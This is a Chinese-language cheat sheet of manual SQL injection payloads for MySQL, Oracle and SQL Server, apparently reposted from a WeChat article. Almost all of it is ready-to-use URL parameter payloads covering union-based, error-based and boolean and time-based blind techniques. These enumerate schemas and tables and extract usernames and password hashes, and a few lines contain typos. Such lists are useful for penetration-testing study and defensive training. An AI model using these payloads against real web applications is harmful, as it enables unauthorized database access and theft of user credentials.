SQL手工注入方法

https://mp.weixin.qq.com/s/RLdBCOUkcLpRoniacOP-Kw

1、Mysql 手工注入

联合注入

?id=1' order by 4--+

?id=0' union select 1,2,3,database()--+

?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+

?id=0' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+

#group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name

?id=0' union select 1,2,3,group_concat(password) from users --+

#group_concat 可替换为 concat_ws(',',id,users,password )

?id=0' union select 1,2,3,password from users limit 0,1--+

报错注入

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()

select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()

select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

updatexml() 报错的原理：由于 updatexml 的第二个参数需要 Xpath 格式的字符串，以 ~ 开头的内容不是 xml

格式的语法，concat() 函数为字符串连接函数显然不符合规则，但是会将括号内的执行结果以错误的形式报出，这样就可以实现报错注入了。

爆库：?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- +

爆表：?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- +

爆字段：?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- +

爆数据：?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +

#concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)

这里需要注意的是它加了连接字符，导致数据中的 md5 只能爆出 31 位，这里可以用分割函数分割出来：

substr(string string,num start,num length);

#string为字符串,start为起始位置,length为长度

?id=1' and updatexml(1,concat(0x7e, substr((select password from users limit 1,1),1,16),0x7e),1) -- +

盲注

时间盲注

?id=1' and if(ascii(substr(database(),1,1))>115,1,sleep(5))--+

?id=1' and if((substr((select user()),1,1)='r'),sleep(5),1)--+

布尔盲注

?id=1' and substr((select user()),1,1)='r' -- +

?id=1' and IFNULL((substr((select user()),1,1)='r'),0) -- +

#如果 IFNULL 第一个参数的表达式为 NULL，则返回第二个参数的备用值，不为 Null 则输出值

?id=1' and strcmp((substr((select user()),1,1)='r'),1) -- +

#若所有的字符串均相同，STRCMP() 返回 0，若根据当前分类次序，第一个参数小于第二个，则返回 -1 ，其它情况返回 1

Oracle 手工注入

联合注入

?id=-1' union select user,null from dual--

?id=-1' union select version,null from v$instance--

?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)--

?id=-1' union select column_name,null from (select * from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)--

?id=-1' union select username,passwd from users--

?id=-1' union select username,passwd from (select * from (select username,passwd,rownum as limit from users) where limit=3)--

报错注入

?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like 'Oracle%))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit= 3))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))--

?id=1' and 1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))--

布尔盲注

?id=1' and 1=(select decode(user,'SYSTEM',1,0,0) from dual)--

?id=1' and 1=(select decode(substr(user,1,1),'S',1,0,0) from dual)--

?id=1' and ascii(substr(user,1,1))> 64-- #二分法

时间盲注

?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--

SQL server 手工注入

联合注入

?id=-1' union select null,null--

?id=-1' union select @@servername, @@version--

?id=-1' union select db_name(),suser_sname()--

?id=-1' union select (select top 1 name from sys.databases where name not in (select top 6 name from sys.databases)),null--

?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null--

?id--1' union select (select top 1 table_ name from information_schema.tables where table_name not in (select top 0 table_name from information_schema.tables)),null--

?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null---

?id=-1' union select (select top 1 username from users where username not in (select top 3 username from users)),null--

报错注入

?id=1' and 1=(select 1/@@servername)--

?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--

盲注

布尔盲注

?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--

时间盲注

?id= 1';if(2>1) waitfor delay '0:0:5'--

?id= 1';if(ASCII(SUBSTRING((select db_name(1)),1,1))> 64) waitfor delay '0:0:2'--